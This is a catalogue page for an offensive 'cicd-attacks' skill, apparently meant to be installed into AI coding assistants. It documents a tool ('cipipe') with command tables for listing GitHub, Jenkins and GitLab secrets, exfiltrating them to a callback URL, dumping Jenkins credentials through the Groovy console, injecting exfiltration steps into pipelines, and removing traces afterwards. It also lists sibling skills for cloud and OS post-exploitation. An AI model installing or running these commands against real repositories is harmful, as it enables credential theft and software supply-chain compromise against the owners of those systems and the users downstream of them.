菜单
CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab
用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
基于 SOC 职业分类
eBPF-based post-exploitation for kernel-level credential harvesting, process hiding, and traffic interception on Linux
AWS post-exploitation for IAM privilege escalation, data exfiltration, persistence, and operational security via boto3
Azure/Entra ID post-exploitation for tenant compromise, Key Vault extraction, managed identity abuse, and token manipulation
Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence
macOS post-exploitation for credential harvesting, DTrace monitoring, TCC bypass, and stealth operations via native tools
Windows userland post-exploitation for credential harvesting, monitoring, AMSI/ETW bypass, and stealth operations
| name | cicd-attacks |
| description | CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab |
| category | post-exploitation |
| tags | ["cicd","github-actions","jenkins","gitlab","pipeline","supply-chain","secret-extraction","credential-access"] |
| tech_stack | ["github","jenkins","gitlab","python","requests"] |
| cwe_ids | ["CWE-522","CWE-693","CWE-829","CWE-284"] |
| chains_with | ["T1195.002","T1552.004","T1059","T1098"] |
| prerequisites | ["T1078"] |
| version | 1.0 |
CI/CD pipeline attacks target the software delivery infrastructure to extract secrets, inject malicious code, and establish persistence. After gaining access to GitHub, Jenkins, or GitLab, these tools extract stored credentials, inject pipeline steps for secret exfiltration, and manipulate workflow configurations.
pip3 install requests# Quick prerequisite check — GitHub
curl -s -H "Authorization: Bearer $GITHUB_TOKEN" https://api.github.com/user | jq .login
# Quick prerequisite check — Jenkins
curl -s -u "$JENKINS_USER:$JENKINS_TOKEN" "$JENKINS_URL/api/json" | jq .nodeDescription
# Quick prerequisite check — GitLab
curl -s -H "Private-Token: $GITLAB_TOKEN" "$GITLAB_URL/api/v4/user" | jq .username
| Action | Command | Purpose |
|---|---|---|
| List GitHub secrets | cipipe gh_secrets --repo OWNER/REPO --method list | Enumerate repository and environment secret names |
| Jenkins credentials | cipipe jenkins_creds --url URL --method api | List credential store entries |
| GitLab variables | cipipe gitlab_tokens --url URL --project-id ID | Enumerate CI/CD variables and tokens |
| Action | Command | Purpose |
|---|---|---|
| GitHub dispatch | cipipe gh_secrets --repo OWNER/REPO --method dispatch --callback-url URL | Exfiltrate secrets via workflow dispatch |
| Jenkins console | cipipe jenkins_creds --url URL --method console | Extract credentials via Groovy Script Console |
| GitHub logs | cipipe gh_secrets --repo OWNER/REPO --method logs | Search workflow logs for leaked secrets |
| Action | Command | Purpose |
|---|---|---|
| Inject pipeline | cipipe pipeline_inject --repo OWNER/REPO --callback-url URL | Add exfiltration step to CI/CD pipeline |
cipipe cleanup_ci
| Program | Technique | MITRE ATT&CK |
|---|---|---|
| gh_secrets | GitHub Actions secret extraction | T1552.004 — Private Keys |
| jenkins_creds | Jenkins credential dump | T1555 — Credentials from Password Stores |
| pipeline_inject | CI/CD pipeline injection | T1195.002 — Compromise Software Supply Chain |
| gitlab_tokens | GitLab CI/CD variable extraction | T1552.004 — Private Keys |
| cleanup_ci | Pipeline modification rollback | T1070 — Indicator Removal |